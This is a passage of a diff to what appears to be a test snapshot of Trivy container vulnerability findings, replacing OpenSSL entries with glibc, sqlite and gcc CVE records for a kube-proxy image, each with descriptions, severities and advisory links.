"https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3450", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3450", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", - "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3450.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://www.cve.org/CVERecord?id=CVE-2021-3450", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-08", - "https://www.tenable.com/security/tns-2021-09", + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", ], }, "category": "Vulnerability", - "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3450", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3450", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", + ], + }, + "category": "Vulnerability", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-08", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.5", + "packageName": "libdb5.3", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", + }, + { + "type": "URL", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + }, + { + "type": "URL", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "value": "https://usn.ubuntu.com/4019-1/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", + ], + }, + "category": "Vulnerability", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + 